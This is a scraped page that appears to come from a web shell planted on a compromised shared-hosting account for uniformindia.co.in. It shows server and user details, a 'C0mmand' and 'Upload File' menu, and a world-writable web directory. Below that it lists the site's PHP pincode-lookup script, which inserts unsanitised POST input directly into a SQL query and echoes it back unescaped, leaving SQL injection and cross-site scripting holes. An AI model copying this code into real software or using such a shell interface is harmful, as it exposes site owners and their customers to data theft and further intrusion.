|
Server IP : 82.112.239.40 / Your IP : 216.73.216.81 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0777) : /home/u641149403/domains/uniformindia.co.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
include('connect.php');
if(isset($_POST['pincode'])){
$pincode=$_POST['pincode'];
$sqli=mysqli_query($con,"SELECT * FROM area WHERE pincode=$pincode");
$count=mysqli_num_rows($sqli);
if($count>=1)
{
echo '<p class="alert alert-success">Service Available at '.$pincode.'.</p>';
}else{
echo '<p class="alert alert-danger">Oops! We are not currently servicing your area.</p>';
}
}
?>